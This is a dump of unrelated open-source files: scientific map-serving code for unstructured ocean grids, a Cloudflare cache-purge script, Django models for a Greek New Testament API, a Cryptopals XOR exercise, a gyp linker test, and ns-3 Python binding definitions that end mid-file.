# create pertinent time dimensions if they aren't already present
for unique_time_dim in unique_time_dims:
dim_size = len(nc.dimensions[unique_time_dim])
try:
cached_nc.createDimension(unique_time_dim, size=dim_size)
except RuntimeError:
continue
# support cases where there may be more than one variable with standard_name='time' in a dataset
for time_var in time_vars:
try:
time_var_obj = cached_nc.createVariable(time_var._name,
time_var.dtype,
time_var.dimensions)
except RuntimeError:
time_var_obj = cached_nc.variables[time_var.name]
time_var_obj[:] = time_var[:]
time_var_obj.units = time_var.units
time_var_obj.standard_name = 'time'
# Now do the RTree index
self.make_rtree()
self.cache_last_updated = datetime.utcnow().replace(tzinfo=pytz.utc)
self.save()
def minmax(self, layer, request):
time_index, time_value = self.nearest_time(layer, request.GET['time'])
wgs84_bbox = request.GET['wgs84_bbox']
with self.dataset() as nc:
data_obj = nc.variables[layer.access_name]
data_location = data_obj.location
mesh_name = data_obj.mesh
ug = UGrid.from_ncfile(self.topology_file, mesh_name=mesh_name)
coords = np.empty(0)
if data_location == 'node':
coords = ug.nodes
elif data_location == 'face':
coords = ug.face_coordinates
elif data_location == 'edge':
coords = ug.edge_coordinates
lon = coords[:, 0]
lat = coords[:, 1]
spatial_idx = data_handler.lat_lon_subset_idx(lon, lat, wgs84_bbox.minx, wgs84_bbox.miny, wgs84_bbox.maxx, wgs84_bbox.maxy)
vmin = None
vmax = None
data = None
if isinstance(layer, Layer):
if (len(data_obj.shape) == 3):
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data = data_obj[time_index, z_index, spatial_idx]
elif (len(data_obj.shape) == 2):
data = data_obj[time_index, spatial_idx]
elif len(data_obj.shape) == 1:
data = data_obj[spatial_idx]
else:
logger.debug("Dimension Mismatch: data_obj.shape == {0} and time = {1}".format(data_obj.shape, time_value))
if data is not None:
vmin = np.nanmin(data).item()
vmax = np.nanmax(data).item()
elif isinstance(layer, VirtualLayer):
# Data needs to be [var1,var2] where var are 1D (nodes only, elevation and time already handled)
data = []
for l in layer.layers:
data_obj = nc.variables[l.var_name]
if (len(data_obj.shape) == 3):
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data.append(data_obj[time_index, z_index, spatial_idx])
elif (len(data_obj.shape) == 2):
data.append(data_obj[time_index, spatial_idx])
elif len(data_obj.shape) == 1:
data.append(data_obj[spatial_idx])
else:
logger.debug("Dimension Mismatch: data_obj.shape == {0} and time = {1}".format(data_obj.shape, time_value))
if ',' in layer.var_name and data:
# Vectors, so return magnitude
data = [ sqrt((u*u) + (v*v)) for (u, v,) in data.T if u != np.nan and v != np.nan]
vmin = min(data)
vmax = max(data)
return gmd_handler.from_dict(dict(min=vmin, max=vmax))
def getmap(self, layer, request):
time_index, time_value = self.nearest_time(layer, request.GET['time'])
wgs84_bbox = request.GET['wgs84_bbox']
with self.dataset() as nc:
data_obj = nc.variables[layer.access_name]
data_location = data_obj.location
mesh_name = data_obj.mesh
ug = UGrid.from_ncfile(self.topology_file, mesh_name=mesh_name)
coords = np.empty(0)
if data_location == 'node':
coords = ug.nodes
elif data_location == 'face':
coords = ug.face_coordinates
elif data_location == 'edge':
coords = ug.edge_coordinates
lon = coords[:, 0]
lat = coords[:, 1]
if request.GET['vectorscale'] is not None: # is not None if vectors are being plotted
vectorscale = request.GET['vectorscale']
padding_factor = calc_safety_factor(vectorscale)
vectorstep = request.GET['vectorstep'] # returns 1 by default if vectors are being plotted
spatial_idx_padding = calc_lon_lat_padding(lon, lat, padding_factor) * vectorstep
spatial_idx = data_handler.lat_lon_subset_idx(lon, lat,
wgs84_bbox.minx,
wgs84_bbox.miny,
wgs84_bbox.maxx,
wgs84_bbox.maxy,
padding=spatial_idx_padding
)
if vectorstep > 1:
np.random.shuffle(spatial_idx)
nvec = int(len(spatial_idx) / vectorstep)
spatial_idx = spatial_idx[:nvec]
else:
spatial_idx = data_handler.lat_lon_subset_idx(lon, lat,
wgs84_bbox.minx,
wgs84_bbox.miny,
wgs84_bbox.maxx,
wgs84_bbox.maxy
)
face_indicies = ug.faces[:]
face_indicies_spatial_idx = data_handler.faces_subset_idx(face_indicies, spatial_idx)
# If no triangles intersect the field of view, return a transparent tile
if (len(spatial_idx) == 0) or (len(face_indicies_spatial_idx) == 0):
logger.debug("No triangles in field of view, returning empty tile.")
return self.empty_response(layer, request)
if isinstance(layer, Layer):
if (len(data_obj.shape) == 3):
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data = data_obj[time_index, z_index, :]
elif (len(data_obj.shape) == 2):
data = data_obj[time_index, :]
elif len(data_obj.shape) == 1:
data = data_obj[:]
else:
logger.debug("Dimension Mismatch: data_obj.shape == {0} and time = {1}".format(data_obj.shape, time_value))
return self.empty_response(layer, request)
if request.GET['image_type'] == 'filledcontours':
mask = np.isnan(data) # array with NaNs appearing as True
if mask.any():
data_mask = ~mask # negate the NaN boolean array; mask for non-NaN data elements
# slice the data, lon, and lat to get elements that correspond to non-NaN values
data = data_mask[data_mask]
lon = lon[data_mask]
lat = lat[data_mask]
# recalculate the spatial index using the subsetted lat/lon
spatial_idx = data_handler.lat_lon_subset_idx(lon,
lat,
wgs84_bbox.minx,
wgs84_bbox.miny,
wgs84_bbox.maxx,
wgs84_bbox.maxy
)
face_indicies_spatial_idx = data_handler.faces_subset_idx(face_indicies, spatial_idx)
tri_subset = Tri.Triangulation(lon,
lat,
triangles=face_indicies[face_indicies_spatial_idx]
)
return mpl_handler.tricontourf_response(tri_subset,
data,
request
)
else:
raise NotImplementedError('Image type "{}" is not supported.'.format(request.GET['image_type']))
elif isinstance(layer, VirtualLayer):
# Data needs to be [var1,var2] where var are 1D (nodes only, elevation and time already handled)
data = []
for l in layer.layers:
data_obj = nc.variables[l.var_name]
if (len(data_obj.shape) == 3):
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data.append(data_obj[time_index, z_index, :])
elif (len(data_obj.shape) == 2):
data.append(data_obj[time_index, :])
elif len(data_obj.shape) == 1:
data.append(data_obj[:])
else:
logger.debug("Dimension Mismatch: data_obj.shape == {0} and time = {1}".format(data_obj.shape, time_value))
return self.empty_response(layer, request)
if request.GET['image_type'] == 'vectors':
return mpl_handler.quiver_response(lon[spatial_idx],
lat[spatial_idx],
data[0][spatial_idx],
data[1][spatial_idx],
request,
vectorscale
)
else:
raise NotImplementedError('Image type "{}" is not supported.'.format(request.GET['image_type']))
def getfeatureinfo(self, layer, request):
with self.dataset() as nc:
with self.topology() as topo:
data_obj = nc.variables[layer.access_name]
data_location = data_obj.location
# mesh_name = data_obj.mesh
# Use local topology for pulling bounds data
# ug = UGrid.from_ncfile(self.topology_file, mesh_name=mesh_name)
geo_index, closest_x, closest_y, start_time_index, end_time_index, return_dates = self.setup_getfeatureinfo(topo, data_obj, request, location=data_location)
logger.info("Start index: {}".format(start_time_index))
logger.info("End index: {}".format(end_time_index))
logger.info("Geo index: {}".format(geo_index))
return_arrays = []
z_value = None
if isinstance(layer, Layer):
if len(data_obj.shape) == 3:
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data = data_obj[start_time_index:end_time_index, z_index, geo_index]
elif len(data_obj.shape) == 2:
data = data_obj[start_time_index:end_time_index, geo_index]
elif len(data_obj.shape) == 1:
data = data_obj[geo_index]
else:
raise ValueError("Dimension Mismatch: data_obj.shape == {0} and time indexes = {1} to {2}".format(data_obj.shape, start_time_index, end_time_index))
return_arrays.append((layer.var_name, data))
elif isinstance(layer, VirtualLayer):
# Data needs to be [var1,var2] where var are 1D (nodes only, elevation and time already handled)
for l in layer.layers:
data_obj = nc.variables[l.var_name]
if len(data_obj.shape) == 3:
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data = data_obj[start_time_index:end_time_index, z_index, geo_index]
elif len(data_obj.shape) == 2:
data = data_obj[start_time_index:end_time_index, geo_index]
elif len(data_obj.shape) == 1:
data = data_obj[geo_index]
else:
raise ValueError("Dimension Mismatch: data_obj.shape == {0} and time indexes = {1} to {2}".format(data_obj.shape, start_time_index, end_time_index))
return_arrays.append((l.var_name, data))
# Data is now in the return_arrays list, as a list of numpy arrays. We need
# to add time and depth to them to create a single Pandas DataFrame
if (len(data_obj.shape) == 3):
df = pd.DataFrame({'time': return_dates,
'x': closest_x,
'y': closest_y,
'z': z_value})
elif (len(data_obj.shape) == 2):
df = pd.DataFrame({'time': return_dates,
'x': closest_x,
'y': closest_y})
elif (len(data_obj.shape) == 1):
df = pd.DataFrame({'x': closest_x,
'y': closest_y})
else:
df = pd.DataFrame()
# Now add a column for each member of the return_arrays list
for (var_name, np_array) in return_arrays:
df.loc[:, var_name] = pd.Series(np_array, index=df.index)
return gfi_handler.from_dataframe(request, df)
def wgs84_bounds(self, layer):
with self.dataset() as nc:
try:
data_location = nc.variables[layer.access_name].location
mesh_name = nc.variables[layer.access_name].mesh
# Use local topology for pulling bounds data
ug = UGrid.from_ncfile(self.topology_file, mesh_name=mesh_name)
coords = np.empty(0)
if data_location == 'node':
coords = ug.nodes
elif data_location == 'face':
coords = ug.face_coordinates
elif data_location == 'edge':
coords = ug.edge_coordinates
minx = np.nanmin(coords[:, 1])
miny = np.nanmin(coords[:, 0])
maxx = np.nanmax(coords[:, 1])
maxy = np.nanmax(coords[:, 0])
return DotDict(minx=minx, miny=miny, maxx=maxx, maxy=maxy)
except AttributeError:
pass
def nearest_z(self, layer, z):
"""
Return the z index and z value that is closest
"""
depths = self.depths(layer)
depth_idx = bisect.bisect_right(depths, z)
try:
depths[depth_idx]
except IndexError:
depth_idx -= 1
return depth_idx, depths[depth_idx]
def times(self, layer):
with self.topology() as nc:
time_vars = nc.get_variables_by_attributes(standard_name='time')
if len(time_vars) == 1:
time_var = time_vars[0]
else:
# if there is more than variable with standard_name = time
# fine the appropriate one to use with the layer
var_obj = nc.variables[layer.access_name]
time_var_name = find_appropriate_time(var_obj, time_vars)
time_var = nc.variables[time_var_name]
return netCDF4.num2date(time_var[:], units=time_var.units)
def depth_variable(self, layer):
with self.dataset() as nc:
try:
layer_var = nc.variables[layer.access_name]
for cv in layer_var.coordinates.strip().split():
try:
coord_var = nc.variables[cv]
if hasattr(coord_var, 'axis') and coord_var.axis.lower().strip() == 'z':
return coord_var
elif hasattr(coord_var, 'positive') and coord_var.positive.lower().strip() in ['up', 'down']:
return coord_var
except BaseException:
pass
except AttributeError:
pass
def depth_direction(self, layer):
d = self.depth_variable(layer)
if d is not None:
if hasattr(d, 'positive'):
return d.positive
return 'unknown'
def depths(self, layer):
d = self.depth_variable(layer)
if d is not None:
return range(0, d.shape[0])
return []
def humanize(self):
return "UGRID"
|
ebmdatalab/openprescribing
|
refs/heads/dependabot/pip/google-auth-1.32.1
|
deploy/clear_cache.py
|
1
|
import json
import os
import requests
import dotenv
# This zone ID may change if/when our account changes
# Run `list_cloudflare_zones` (below) to get a full list
ZONE_ID = "198bb61a3679d0e1545e838a8f0c25b9"
def list_cloudflare_zones():
url = "https://api.cloudflare.com/client/v4/zones"
headers = {
"Content-Type": "application/json",
"X-Auth-Key": os.environ["CF_API_KEY"],
"X-Auth-Email": os.environ["CF_API_EMAIL"],
}
result = json.loads(requests.get(url, headers=headers).text)
zones = [{"name": x["name"], "id": x["id"]} for x in result["result"]]
print(zones)
def clear_cloudflare():
url = "https://api.cloudflare.com/client/v4/zones/%s"
headers = {
"Content-Type": "application/json",
"X-Auth-Key": os.environ["CF_API_KEY"],
"X-Auth-Email": os.environ["CF_API_EMAIL"],
}
data = {"purge_everything": True}
result = json.loads(
requests.delete(
url % ZONE_ID + "/purge_cache", headers=headers, data=json.dumps(data)
).text
)
if result["success"]:
print("Cloudflare clearing succeeded")
else:
raise ValueError(
"Cloudflare clearing failed: %s" % json.dumps(result, indent=2)
)
if __name__ == "__main__":
env_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "..", "environment"
)
dotenv.read_dotenv(env_path, override=True)
clear_cloudflare()
|
morphgnt/morphgnt-api
|
refs/heads/master
|
morphgnt_api/models.py
|
1
|
from django.core.urlresolvers import reverse
from django.db import models
from .ref import verse_from_bcv, verse_range_title
def parse_as_dict(parse):
return {
label: parse[i]
for i, label in enumerate([
"person", "tense", "voice", "mood", "case", "number", "gender", "degree"
])
if parse[i] != "-"
}
class Word(models.Model):
word_id = models.CharField(max_length=11, db_index=True)
verse_id = models.CharField(max_length=6, db_index=True)
paragraph_id = models.CharField(max_length=5, db_index=True)
sentence_id = models.CharField(max_length=6, db_index=True)
pos = models.CharField(max_length=2)
parse = models.CharField(max_length=8)
crit_text = models.CharField(max_length=50)
text = models.CharField(max_length=50)
word = models.CharField(max_length=50)
norm = models.CharField(max_length=50)
lemma = models.CharField(max_length=50)
dep_type = models.CharField(max_length=4)
head = models.CharField(max_length=11, null=True)
class Meta:
ordering = ["word_id"]
@staticmethod
def get_full_id(word_id):
return reverse("word", args=[word_id]) if word_id else None
def to_dict(self):
d = {
"@id": Word.get_full_id(self.word_id),
"@type": "word",
"verse_id": Verse.get_full_id(self.verse_id),
"paragraph_id": Paragraph.get_full_id(self.paragraph_id),
"sentence_id": Sentence.get_full_id(self.sentence_id),
"pos": self.pos.strip("-"),
"crit_text": self.crit_text,
"text": self.text,
"word": self.word,
"norm": self.norm,
"lemma": self.lemma,
"dep_type": self.dep_type,
"head": Word.get_full_id(self.head),
}
d.update(parse_as_dict(self.parse))
return d
class Paragraph(models.Model):
paragraph_id = models.CharField(max_length=5, db_index=True)
book_osis_id = models.CharField(max_length=6, db_index=True)
prev_paragraph = models.CharField(max_length=5, null=True)
next_paragraph = models.CharField(max_length=5, null=True)
class Meta:
ordering = ["paragraph_id"]
@staticmethod
def get_full_id(paragraph_id):
return reverse("paragraph", args=[paragraph_id]) if paragraph_id else None
def words(self):
return Word.objects.filter(paragraph_id=self.paragraph_id)
def to_dict(self):
words = list(self.words())
first_verse_id = words[0].verse_id
last_verse_id = words[-1].verse_id
return {
"@id": Paragraph.get_full_id(self.paragraph_id),
"title": verse_range_title(first_verse_id, last_verse_id),
"@type": "paragraph",
"prev": Paragraph.get_full_id(self.prev_paragraph),
"next": Paragraph.get_full_id(self.next_paragraph),
"book": Book.get_full_id(self.book_osis_id),
"words": [w.to_dict() for w in words],
}
class Sentence(models.Model):
sentence_id = models.CharField(max_length=6, db_index=True)
book_osis_id = models.CharField(max_length=6, db_index=True)
prev_sentence = models.CharField(max_length=6, null=True)
next_sentence = models.CharField(max_length=6, null=True)
class Meta:
ordering = ["sentence_id"]
@staticmethod
def get_full_id(sentence_id):
return reverse("sentence", args=[sentence_id]) if sentence_id else None
def words(self):
return Word.objects.filter(sentence_id=self.sentence_id)
def to_dict(self):
words = list(self.words())
first_verse_id = words[0].verse_id
last_verse_id = words[-1].verse_id
return {
"@id": Sentence.get_full_id(self.sentence_id),
"title": verse_range_title(first_verse_id, last_verse_id),
"@type": "sentence",
"prev": Sentence.get_full_id(self.prev_sentence),
"next": Sentence.get_full_id(self.next_sentence),
"book": Book.get_full_id(self.book_osis_id),
"words": [w.to_dict() for w in words],
}
class Verse(models.Model):
verse_id = models.CharField(max_length=6, db_index=True)
book_osis_id = models.CharField(max_length=6, db_index=True)
prev_verse = models.CharField(max_length=6, null=True)
next_verse = models.CharField(max_length=6, null=True)
class Meta:
ordering = ["verse_id"]
@staticmethod
def get_full_id(verse_id):
return reverse("verse", args=[verse_id]) if verse_id else None
def words(self):
return Word.objects.filter(verse_id=self.verse_id)
def to_dict(self):
return {
"@id": reverse("verse", args=[self.verse_id]),
"title": verse_from_bcv(self.verse_id).title,
"@type": "verse",
"book": reverse("book", args=[self.book_osis_id]),
"prev": Verse.get_full_id(self.prev_verse),
"next": Verse.get_full_id(self.next_verse),
"words": [w.to_dict() for w in self.words()],
}
class Book(models.Model):
book_osis_id = models.CharField(max_length=6, db_index=True)
name = models.CharField(max_length=20)
sblgnt_id = models.CharField(max_length=2)
class Meta:
ordering = ["sblgnt_id"]
@staticmethod
def get_full_id(book_osis_id):
return reverse("book", args=[book_osis_id]) if book_osis_id else None
def first_verse(self):
return Verse.objects.filter(book_osis_id=self.book_osis_id)[0]
def first_sentence(self):
return Sentence.objects.filter(book_osis_id=self.book_osis_id)[0]
def first_paragraph(self):
return Paragraph.objects.filter(book_osis_id=self.book_osis_id)[0]
def to_dict(self):
return {
"@id": Book.get_full_id(self.book_osis_id),
"@type": "book",
"name": self.name,
"root": reverse("root"),
"first_verse": Verse.get_full_id(self.first_verse().verse_id),
"first_sentence": Sentence.get_full_id(self.first_sentence().sentence_id),
"first_paragraph": Paragraph.get_full_id(self.first_paragraph().paragraph_id),
}
|
dencold/blt
|
refs/heads/master
|
blt/test/importedtest.py
|
1
|
from blt.environment import Commander
class TestCommands(Commander):
def imported_command():
pass
def imported_default():
pass
def imported_alias():
pass
|
bruteforce1/cryptopals
|
refs/heads/master
|
set1/ch2/fixedxor.py
|
1
|
#!/usr/bin/python3
"""
Write a function that takes two equal-length buffers and produces their
XOR combination.
If your function works properly, then when you feed it the string:
1c0111001f010100061a024b53535009181c
... after hex decoding, and when XOR'd against:
686974207468652062756c6c277320657965
... should produce:
746865206b696420646f6e277420706c6179
"""
import argparse
import sys
import binascii
def xor_binary_strings(str1, str2):
if len(str1) != len(str2):
print('XOR strings must be same length')
return ''
if len(str1) % 2 == 1:
print('Hexadecimal strings must be even length')
return ''
bstr1 = binascii.unhexlify(str1)
bstr2 = binascii.unhexlify(str2)
return binascii.hexlify(''.join(chr(x ^ y) for x, y in zip(bstr1, bstr2)).encode('utf-8')).decode('utf-8')
def main():
ret = xor_binary_strings('1c0111001f010100061a024b53535009181c', '686974207468652062756c6c277320657965')
print(ret)
if ret == '746865206b696420646f6e277420706c6179':
print('It worked!')
return 0
return -1
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Tests XOR\'ing a fixed hex value against another fixed \
string.'
)
args = parser.parse_args()
sys.exit(main())
|
erikge/watch_gyp
|
refs/heads/master
|
test/win/gyptest-link-debug-info.py
|
344
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure debug info setting is extracted properly.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
test.run_gyp('debug-info.gyp', chdir=CHDIR)
test.build('debug-info.gyp', test.ALL, chdir=CHDIR)
suffix = '.exe.pdb' if test.format == 'ninja' else '.pdb'
test.built_file_must_not_exist('test_debug_off%s' % suffix, chdir=CHDIR)
test.built_file_must_exist('test_debug_on%s' % suffix, chdir=CHDIR)
test.pass_test()
|
shinglyu/ns3-h264-svc
|
refs/heads/master
|
src/config-store/bindings/modulegen__gcc_ILP32.py
|
72
|
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.config_store', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## file-config.h (module 'config-store'): ns3::FileConfig [class]
module.add_class('FileConfig', allow_subclassing=True)
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore [class]
module.add_class('GtkConfigStore')
## file-config.h (module 'config-store'): ns3::NoneFileConfig [class]
module.add_class('NoneFileConfig', parent=root_module['ns3::FileConfig'])
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## config-store.h (module 'config-store'): ns3::ConfigStore [class]
module.add_class('ConfigStore', parent=root_module['ns3::ObjectBase'])
## config-store.h (module 'config-store'): ns3::ConfigStore::Mode [enumeration]
module.add_enum('Mode', ['LOAD', 'SAVE', 'NONE'], outer_class=root_module['ns3::ConfigStore'])
## config-store.h (module 'config-store'): ns3::ConfigStore::FileFormat [enumeration]
module.add_enum('FileFormat', ['XML', 'RAW_TEXT'], outer_class=root_module['ns3::ConfigStore'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3FileConfig_methods(root_module, root_module['ns3::FileConfig'])
register_Ns3GtkConfigStore_methods(root_module, root_module['ns3::GtkConfigStore'])
register_Ns3NoneFileConfig_methods(root_module, root_module['ns3::NoneFileConfig'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3ConfigStore_methods(root_module, root_module['ns3::ConfigStore'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3FileConfig_methods(root_module, cls):
